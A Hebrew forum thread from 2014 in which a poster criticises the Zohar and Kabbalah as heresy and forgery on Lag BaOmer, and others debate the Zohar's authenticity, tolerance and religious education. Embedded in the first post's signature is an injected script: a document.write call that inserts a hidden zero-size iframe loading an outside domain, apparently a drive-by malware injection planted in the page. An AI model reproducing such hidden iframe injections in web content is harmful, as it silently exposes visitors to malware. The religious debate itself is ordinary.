בית פורומים עצור כאן חושבים

לשונות האש עולות עד השמים: דברי תוכחה ליום אידם

שלום אורח. באפשרותך להתחבר או להירשם
הצג 15 הודעות בעמוד הוסף לדף האישי  דווח למנהל שלח לחבר
נשלח ב-15/5/2014 17:37 לינק ישיר 
לשונות האש עולות עד השמים: דברי תוכחה ליום אידם

היום הולך ומתקרב. עבור הילדים שבינינו, אין כמוהו. לאסוף עצים, לבנות מדורות, ואז, בהגיע השעה הגדולה, מדליקים את האש.

כל אחד והאש שלו.

את הקטעים הבאים אפשר היה לקרוא ביתד נאמן (טו באייר תשע"ד), בחתימתו של הרב דוד ברוורמן, שלפי הדברים עוסק בקירוב רחוקים.

"ליל ל"ג בעומר תשע"א. סיימתי הרצאה בחולון. עברתי ליד כיכר מלאה במדורות סמוך לתחנה המרכזית. לשונות האש עלו עד לב השמים. מאות צעירים קיפצו ליד המדורות בליווי מוזיקה לועזית אפריקנית, ולא בדיוק לצלילי השיר "בר יוחאי נמשחת אשריך".

...

המספר מתאר שיחה קצרה עם החוגגים, את נסיונו לברר לכבוד מה המדורות, וקבלת התשובה: נצחונו של בר כוכבא. והוא מביע כאב:

"על רבי שמעון בר יוחאי שמעתם? יודעם אתם משהו על ספר הזוהר הקדוש?... עיני הצטעפו בדמעות על בחורי ישראל, תינוקות שנשבו ואינם יודעים דבר אודות נשמתם.

הכאב העצום לווני ימים רבים. מה יודעים הצעירים הללו? נשמות טהורות אלו, עצמנו ובשרנו הם, ואפילו את השם רשב"י לא שמעו!

עד כאן ציטוט.

אפשר להביע התנגדות לפטרנליזם (=אני יודע והם לא), או לאכסניה (רק בלי פוליטיקה) אבל לטעמי אי אפשר שלא להזדהות עם הכאב האמיתי של מי שיודע שיש אלוקים ויש תורה - כאב על אלו שאינם יודעים. איך אפשר שלא להצטרף לקריאה הזו לאיכפתיות, שלא לתמוך ברצון להועיל וללמד.

ללמד תורה לרבים, לאלו שאינם יודעים, לאלו שהם תינוקות שנשבו בחברה שמונעת מהם את האמת ואת הדרך לאמת, ואת קנית כלי החשיבה שמאפשרים לזהות את האמת.

את המסורת, את התורה.

הבעיה שלי, ולא רק שלי, היא מה בדיוק כוללת התורה שרוצים ללמד – ומי מייצג אותה.

גם אני יכול לכתוב באותה צורה. הנה.

"ליל ל"ג בעומר תשע"ד...

בבני ברק, במירון, בכל מקום בישראל, אפשר לראות מדורות... רבבות יהודים מקפצים ליד המדורות ושרים: "בר יוחאי נמשחת אשריך".

...

המספר יתאר שיחה קצרה אופיינית עם החוגגים, את נסיונו לברר לכבוד מה המדורות, וקבלת התשובה: יום מתן תורת הקבלה לעם ישראל, היום שבו רשב"י יצא מן המערה וקיבל את הקבלה.

ואז המספר, אני, מביע כאב:

"על רבי שמעון בר יוחאי שמעתם או סיפורים ואגדות עם שמעתם? שיודעים אתם משהו על ספר הזוהר? מתי חובר, היכן חובר? מה הוא מכיל?

האם אתם יודעים שהקבלה, מהזוהר אל האר"י, מכילה מינות – אמירות על אלוקים כאילו הוא מתחלק לחלקים. ופורנוגרפיה – תיאורים שכתובים בארמית ונקראים בדרך כלל רק בידי יהודים יראי שמים שאינם שמים לב למה שהם מוציאים בפיהם וזה נראה להם קדוש בתכלית.

... עיני מהצטעפת בדמעות על בחורי ישראל וזקניו, תינוקות שנשבו כולם, שאינם יודעים דבר אודות נשמתם.

הכאב העצום מלווני ימים רבים, משנה לשנה.

מה יודעים הצעירים – והקשישים הללו? והילדים, תינוקות של בית רבן? נשמות טהורות אלו, עצמנו ובשרנו הם, והם מאמינים שרשב"י של הזוהר הוא אותו רשב"י של המשנה והתלמוד!

כולנו נאמנים למסורת שניתנה לנו בסיני. אבל חלקנו, אולי רובנו, מאמינים שגם הזוהר הוא חלק מהמסורת, עם האמירות שהן מינות על אלוקים, עם הפרשנות התיאורגית של המצוות (=כביכול הן נועדו כדי לתקן פגמים באלוהות שנשברה, או להוריד שפע לעולם דרך חלקי האלוהות כמו במערכת צינורות). אין מודעות לשאלות הפילוסופיות החמורות שמראות שאלו הן אמונות בלתי אפשריות, שהן סותרות את האמונה בא-ל אחד ויחיד, שהן מנוגדות למקרא ולחז"ל. אין מודעות לביקורת ההיסטורית שמראה שמדובר בזיוף מלפני כמה מאות שנים. ויש הרבה סתימת פיות נגד מי שמעז להעלות את השאלות, וכל שכן להסיק את המסקנות.

יש בודדים שאינם מוכנים להשלים. והם חיים לעצמם, יודעים שמסביב מלאה הארץ מינות, ומשתדלים להציל את נפשם. לפעמים הם מתייאשים וחושבים שאין שום ערך לתורה כי אלו הם מייצגיה. מעטים עוד יותר מגיעים לכאן, לפורום שלנו.

והרוב? הרוב מאמינים שזה קדוש. שרצון ה' הוא שבני אדם ירקדו מסביב לקבר, שידליקו סביבו משואות. שאדם גדול מסוגל לספר כיצד זחל במעלה הר אלי קבר וגופו רעד מרוב קדושה. אני מאמין לו שזה מה שחש. אני רק סבור שהוא לקה במידה גדושה של אמונת הבל שגרמה לו להרגיש כך.

ואם בארזים נפלה שלהבת, מה יהיה עם התינוקות שנשבו?

מדי שנה בשנה, ביום איד של תינוקות יהודים שנשבו, אני שואל את עצמי מה אפשר לעשות. איך אפשר להסביר, ללמד, להרחיק מטעויות וממינות. ואין לי תשובה. אין לי תשובה.

ומספר הנופלים בפח הולך וגדל. אותם חילונים שרוצים ללמוד תורה, מה מלמדים אותם? איזו יהדות מעניקים להם? נכון שמעניקים להם את היהדות של התורה ושל חז"ל, של תורה ודרך ארץ, של שבת ושל אל תעשה לחברך מה ששנוא עליך. אבל גם יהדות שסוגדת לקברים, שמאמינה שהסוד העמוק ביותר של התורה הוא שאלוהים יצר מעצמו מערכת מפורקת ומקולקלת שצריך לתקן, שהדרך הנכונה לתאר את הקלקול הזה היא ללמוד קבלה ולדבר על זיווגים עליונים...

וזו תכלית האדם.

דווקא הטובים שבהם, המסורים לעבודת ה', רוקדים ושרים הכי חזק. והלהבות עולות עד לב השמים.

האם רק אני מרגיש שהיהדות נשרפת? שהם שורפים את התורה (זה לא ביטוי שהמצאתי. גם בגמרא אמרו שכותבי קמיעות כשורפי תורה).

אני רוצה לסיים בדבר טוב. אז אני מצטט מן ההיסטוריה כדי לנסות להפיק תקוה.

בימי בית שני לא היו רק יהודים של חז"ל. היו איסיים, היו צדוקים (שהיו מחמירים גדולים). היו יהודים-נוצרים שהאמינו שאותו האיש הוא המשיח והוא עתיד לקום לתחיה, או שהוא עדיין חי למרות שהוא מת.

הם נשכחו. רק החוקרים מכירים את שמם ומעשיהם.

מערכת של סיבות מורכבות שמרה על עם ישראל. אחד הגורמים היה המחוייבות העתיקה למונותיאיזם, לזה שיש אלוקים אחד. לתורה, שצריך ללמוד תורה, והתורה מלמדת את האדם לחשוב, לבדוק מקורות, לזהות סתירות. להבדיל בין אמת לשקר.

וכולנו לומדים את התורה, את הגמרא, את כללי החשיבה והעיון.

יש סיכוי.

אם האש בולטת למרחוק, זה בגלל שכעת יש חושך. לאחר התפרצות להבת הרגש, מגיע הזמן להתבונן ולחשוב. וללמוד. אם מי שיכול ילמד, ואם מי שיכול יכתוב, יש סיכוי שמנהיגי המאמינים האלו, שליבם סוף סוף לשמים, יוכלו גם להקשיב ולחזור בתשובה. וכל שכן ההמון.

אמן.

אז אני פונה לכל חברי, לכל מי שרוצה לחשוב, לכל מי שרוצה ללמוד, לכל מי שיאמר: עד כאן, אפילו יהושע בן נון יאמר לי שזה מה שה' רוצה, לא אקבל ממנו. אפילו נביא אומר לך לעבוד עבודה זרה, הוא חייב מיתה ואסור לשמוע לו. (שוב, אלו שתי דוגמאות לדברי חכמים, האחת מן הגמרא, השניה גם נפסקה ברמב"ם).

התרופה לבורות ולהבל אינה מכות ואינה עונשים, לא עלבונות ולא ציניות. רק להסביר וללמד בתקוה שיש מי שמוכן להקשיב.

דברים היוצאים מהלב נכנסים ללב. לא עלינו המלאכה לגמור, ואין אנו בני חורין להיבטל ממנה.

_____תיקון לשון לשיפור הקריאות____________

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");

תוקן על ידי מיימוני ב- 15/05/2014 17:38:26

דווח על תוכן פוגעני

נשלח ב-15/5/2014 17:45 לינק ישיר 

ידוע כי כל הכופר בחג בעומר כמחלל שבת
מימוני, תן לאכול קרטושקע'ס בשקט.
הבעיה אינה לג בעומר אלא כל ההתנהלות החרדית המגיבה על משבר הדת בסטיה כל הזמן ימינה עד שכבר (כמעט) יורדת מהכביש, הסטיה הינה הן בכוונים ליטאיים קלאסיים והן בכל שאתה מוצא אתץ עצמך בשכונה ירושלצית כאשר בעונה ממסויימת לכל ענץ עץ פרי מוצמדים פתקים (כפי הנאה יש כזה מנהג)  ואם בליטאים נפלה שלהבת מה יגידו האחרים

דדווח על תוכן פוגעני

נשלח ב-15/5/2014 17:49 לינק ישיר 

מיימוני
ברוך אומר ועושה, תשכור במוצ"ש מכונית עם זרנוק מים ותעשה סיור בבני ברק.

דדווח על תוכן פוגעני

נשלח ב-15/5/2014 17:59 לינק ישיר 

תלמיד (לא) טועה

תודה על התגובה.

ואני חלוק עליך מאד.

הבעיה היא בהחלט המינות - מונח טכני מדוייק ככל האפשר לתיאור האמונות האלו.

הבעיה היא כל מה שנובע מן האמונות וסביבן.

וכי עבודה זרה דבר קל היא?

יש עוד בעיות. ועוד איך. אבל מי אומר שלציבור שלנו יש רק בעיה אחת ויחידה?

בעל בעמיו

גם לך, תודה על ההתייחסות.

אבל העצה, גם אם היא בחיוך, אינה עצה.

האם לא כתבתי שלא באלימות יוושע עם? אלא על ידי הסברה?

הרבי מקוצק אמר משהו כזה: והיו הדברים האלו על לבבך. אולי יום אחד הלב ייפתח והם ייכנסו.

דדווח על תוכן פוגעני

נשלח ב-15/5/2014 18:18 לינק ישיר 

מיימוני
בזמן המחלקות הגדולה על כתבי הרמב"ם, הרציונליסטים, תומכי הרמב"ם היו יותר אלימים ממתנגדיהם.

דדווח על תוכן פוגעני

נשלח ב-15/5/2014 18:25 לינק ישיר 

מיימוני  
  http://mag.walla.co.il/item/2746697?page=7
- אתה הזנת את הכתב?

דדווח על תוכן פוגעני

נשלח ב-15/5/2014 18:27 לינק ישיר 

בעל

בשעתו חיברתי אשכול על "סובלנותו של הרמב"ם", שם הבאתי מן האיגרת המפורסמת שלו לתלמידו בו התנגד להחרמת מי שהחרימו אותו בבבל.

גם תלמידו האהוב של הרמב"ם רצה להשתמש בנשק שעמד לרשותו, כגון החרמות או כתיבה נגד. הרמב"ם התנגד.

אבל כמה רמב"ם היו?

והרי אדם אינו אבן. כואב לו כשמכאיבים לו, כשצוחקים עליו, על היקר לליבו. גם לי.

אני רק יודע ומזכיר לעצמי ששום דבר לא מועיל אלא הסברה. במאור פנים.

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("");

דדווח על תוכן פוגעני

נשלח ב-15/5/2014 19:11 לינק ישיר 

מיימוני 

הגזמת....

רגיל אנוכי לקרוא אותך כמעלה דעות אפשריות או כמעלה תהיות ,עכשיו אתה ממש מתריס ,
לפני שתעלה כאן חורבן של מינות כשעדיין לא ראיתי מישיבות הקבלה החרדים א ח ד שמדבר בשם אלוהים אחרים או סוגד לו ,אני חושב שעליך,[ למרות הערכתי הרבה אליך ],הייתי אומר טול קורה מבין עיניך ,האתר המשוקץ הזה הוא אכן מלא מינות ופורנוגרפיה ומדרדר לפורנוגרפיה ועזיבת כל חלקה טובה ממקורו,
אם הזוהר שיש לנו כיום הוא מרב שמעון או רק גרעין ממנו ,עדיין מאות שנים לפני משה דה ליאון היה מפורסם בראשונים מדרשו של רב שמעון ,כלך לך לרב יעקב עמדין שאת תוכו אכל וקליפתו זרק ,
אתה בעצמך פעם העדת על עצמך שאינך מבין בקבלה ומאידך גיסא יראים ושלמים הוגים בו זה בגלוי וזה בהסתר ואין רואים על פי דרך לימודם בעייה של מינות וכדומה ,
תתייחס לספירות כנבראים ותירגע,
אנשים במשך הרבה דורות מתעלים ונטענים במלוא חפניים דביקות מהדלקה זו או בהשטתחות בקברו של האי צדיקא ופרישא רב שמעון שיכול לפטור את כל העולם מן הדין ומגדולי מוסרי התורה שיש בידינו ולכן הימים האלה נזכרים ונעשים בכל תפוצות ישראל כהילולא דרב שמעון ולא כהלולת הזוהר שממש אינו נחלת הכלל בראיית זוית זו,
אכן זכורים לנו תקופות אפלות כש"ץ וחביריו שלמדו את הזוהר כראות עיניהם אבל האם לנו לפוסלו משום כך,
גם תורתינו הקדושה גידלה לנו מחלוקות צדוקים ומבקרי המקרא גרמה לנו חורבן ושנאה ירדה בסיני לכן יש בו כדי ביטול?
ומה דעת כבודו על שיר השירים??

תוקן על ידי חסדא ב- 15/05/2014 19:18:40

דדווח על תוכן פוגעני

נשלח ב-15/5/2014 19:21 לינק ישיר 

הרב מימוני
ניכרים דברי אמת- שנכתבו מתוך כאב ופכחון.

דדווח על תוכן פוגעני

נשלח ב-15/5/2014 19:21 לינק ישיר 

חסדא, כתבת 'האתר המשוקץ הזה הוא אכן מלא פורנוגרפיה'.

תוכל להביא לינקים?

דדווח על תוכן פוגעני

נשלח ב-15/5/2014 19:25 לינק ישיר 

לינק אחד-ולא עם הארץ חסיד.-שקרן כן

דדווח על תוכן פוגעני

נשלח ב-15/5/2014 19:47 לינק ישיר 

רבינו מיימוני.שאלת תם:תניא,למדת?
ועוד שאלה.האם קראת את "מבוא לקבלת האריז"ל" של הרב גינזבורג?

נשלח מהאנדרואיד שלי

דדווח על תוכן פוגעני

סמל אישי
נשלח ב-15/5/2014 20:47 לינק ישיר 

מיימוני, 
תודה על הפוסט המושקע. נהניתי לקרוא. ולהזדהות. 
לא בטוחה שהמסקנות נכונות. 
בתור יו"ר אגודת יושבות ספסלי הגינה, אני יכולה להעלות חשש רציני, 
כי אם תוכיח לפשוטי העם שיש ספק סביר בדבר מקור הזוהר, 
ייכנסו בליבם ספקות גם על כל השאר.
אצלם הכל מעורבב ביחד: תורה, עשרת הדיברות, עיקרי אמונה, חז"ל, מדרשים, קבלה, מיסטיקה, הכל קדוש. 
החל מ'בראשית' ועד לאדמורי זמננו, ('היתומים הפרחוניים', כלשונו הזהב של נתנאל). 
הכל קדוש באותה מידה, בעיני אשה פשוטה מהגינה. 
כפירה גוררת כפירה. 
אולי מוטב שיישארו פשוטי העם טיפשים כל ימיהם, יאמינו בח"י רוטל, בח"י כיכרות, בח"י כל מה שזז,
ולא יבעטו בכל התורה כולה.
כי כרגע יש לך עדר טיפשים, שיש עליהם שליטה. 
אם תעודד אותם לחשיבה עצמאית, אז יהיה לך עדר טיפשים, שאין עליהם שום שליטה. 
אולי. 
ואולי אני טועה.

דדווח על תוכן פוגעני

נשלח ב-15/5/2014 22:04 לינק ישיר 

חסדא

יפה לו לאדם להתבטא בלשון זהירה. כל מה שאני כותב על הזוהר ועל קבלת האר"י הוא לפי מה שלמדתי והבנתי.

אם טעיתי, אשמח אם יעמידוני על טעותי. לא פתחתי סבורני אף פעם אשכול על קבלת האר"י אבל אפשר לעשות זאת. ובו נברר.

לגבי הזוהר, אתה מוזמן לאשכול ותיק מאד המראה שמדובר בזיוף היסטורי. כמובן, ניתן לטעון שיש בו גרעין קדמון, אם גם הלבישו אותו על דמויות פיקטיביות (=דמיוניות) שהרי רבי שמעון של הזוהר אינו זה של הגמרא. וכמובן צריך להראות שזה כך.

נדמה לי שקוראים לאשכול "קדמות הזוהר" והוא אחד הארוכים בפורום. אתה מוזמן לעיין קצת בנימוקים ולהוסיף בסוף או לפתוח חדש.

לגבי היות פורנוגרפיה באתר הזה, אני מתפלא על דבריך. אני עצמי משתדל שלא יהיו בו דברים כאלו, ואיני היחיד שמשגיח על כך. אם מצאת משהו, אנא הודיענו, כדי שנתקן.

למינגית

הנקודה שאת מעלה היא אכן חשובה.

אבל הרשי לי לשאול: האם באמת בני אדם אינם מסוגלים להבדיל?

ומי בכלל יצר את החיבור בין הקבלה לבין היהדות? היו אלו אנשים שהחדירו זאת אט אט. וגם היום ממשיכים ללמד זאת כאילו זו תורה מסיני.

אז אולי הטענה היא נגד המחנכים ומעצבי החינוך אצלנו?

מה שאני בא לומר הוא שיש שינויים המתרחשים בתרבות, וניתן לעצב אותם. כפי שהופכים את היהדות למחסן שלתוכו גודשים כל מיני דברים, כמו קבלה, חסידות, באבות, ועוד ועוד, גם דברים שאסורים במפורש מן התורה (דוגמאות בשפע), האם לא ניתן לעשות גם הפוך?

בדרך כלל אנו, החשדנים, הזהירים, היודעים להבדיל בין עיקר לטפל, בין מקורי למחודש וזר, בין עצם היהדות לבין פרשנות שמשנה  אותה לדבר אחר לגמרי - אנו שותקים. לפחות במגזר שלנו.

השאלה שלי אכן היתה איך לשנות. איך להגיע לכל מקום. זה לא פשוט, והבעיה שהעלית היא אכן אחד הקשיים.

ולמעשה, יש קשיים קודמים. עוד לפני שמפרסמים, למי פונים, מי יקשיב, האם אלו שממלאים תפקידים מנחים עבור הציבור ירצו לדעת, ירשו לעצמם לחשוב, לבדוק, לדחות ולקרב לפי הממצאים?

דבר אחד אני יכול לומר, וכמדומה שגם את כתבת על כן באשכולך הראשון (ששימח אותי) - יש כאלו שעבורם זו הצלת נפשות.

ואם עבודה זרה ומינות הן החמורות שבעברות, זו הצלת נפשות לכלל האומה.

ויש להאריך ולדון.

שחור כתום

שאלת שאלה קלה:

קראתי את ה"תניא". נדמה לי שפעם כתבתי על כמה בעיות שזיהיתי בו, אם מותר לי להתבטא בצורה כזו, כמו הפרשנות הייחודית שלו, נגד הגמרא, לדמותו של הצדיק. ואולי עוד.

לגבי גינצבורג, לא קראתי את הספר הזה שלו. קראתי משלו, ואין לי דברים טובים לכתוב על דבריו כלל. כמדומה שהיה עליו אשכול. אולי תמצא ותעלה את הלינק ואפשר יהיה לדון. אני גם מוכן לעיין בדברים שוב, אם הספר שלו מופיע באינטרנט ותוכל לשלוח לינק.

דדווח על תוכן פוגעני

נשלח ב-15/5/2014 22:14 לינק ישיר 

הרב מיימוני היקר.

אתה צריך לדעתי ללמוד מרקס לא להתווכח עם הדת (דת ל"ג בעומר) רק להתמודד עם המצוקות שמביא את הדת.

אני אצטט שוב את דבריו מהאשכול הסמוך

"אצל מרקס אין תפיסה וולגרית שהדת היא רק מניפולציה של כמרים ורבנים ושליטים שעושים מניפולציה לעם, על מנת לטמטם אותו. לא, (= לא זה מה שאמר מרקס, רק,,) במקום שיש לך ביטויים דתיים ?! סימן שיש מצוקה אמיתית !! לא צריך מניפולציה של כמרים ורבנים, (הדת,,,) היא ביטוי למצוקה אמיתית. אבל היא (= הדת) כמו אופיום (רק כמשכך כאבים ולא מרפא באמת) היא לא נותנת לך את הפתרון. והפיתרון הוא לא להתמודד עם הדת, אלא להתמודד עם הסיבות שמביאות לאנשים את המצוקה שמביא אותם לדת. ולכן מרקס לא מתווכח - בניגוד לאחרים - עם הדת."

תוקן על ידי maxmen ב- 15/05/2014 22:14:54

דדווח על תוכן פוגעני

נשלח ב-15/5/2014 23:17 לינק ישיר 

מקסמן היקר

ראיתי את הודעתך רק כעת. כנראה שלחת אותה בשעה שכתבתי ושלחתי את שלי.

אני מסכים שצריך להבין את הצורך בדת, שהוא מגוון ועשיר ואינו שטחי כפי שמרקס, לפי מה שקראתי עליו, כותב עליו.

אבל בעיקר אני פונה למי שמאמין בדת ואינו מחפש להחליף אותה, וגם אני איני רוצה ליטול ממנו את הדת שלו, שלנו, של כולנו.

אני כן רוצה שילמד להבדיל בין הדת כפי שהיא לבין הדת לפי מה שעשו ממנה.

הדיון הוא פנימי בתוך הדת אם כי הוא צריך להתקיים לא באופן הרגיל שלנו, כלומר על ידי ציטוטים מסמכות, אלא על ידי שימוש בכלים מחקריים, כמו היסטוריה, ארכיאולוגיה, בלשנות, ועוד. וראשית לכל, צריך לחנך ולהתחנך לחשוב ולהסיק מסקנות, בלי לפחד, בלי רגשות אשמה. לא לזרוק הכל אלא לזרוק את מה שמוכח שאינו יכול להיות אמת. וכאן צריך להרגיע את המאמין שזו אינה עבירה אלא מצוה, שאין אנו בעד ויתור על האמונה ועל ההלכה, אלא על טיהורן.

דדווח על תוכן פוגעני

בית > פורומים > דת ואמונה > עצור כאן חושבים > לשונות האש עולות עד השמים: דברי תוכחה ליום אידם
מנהל לחץ כאן לנעילת האשכול
הוסף לעמוד האישי  דווח למנהל שלח לחבר
1 2 3 ... 8 9 10 לדף הבא סך הכל 10 דפים.

bholext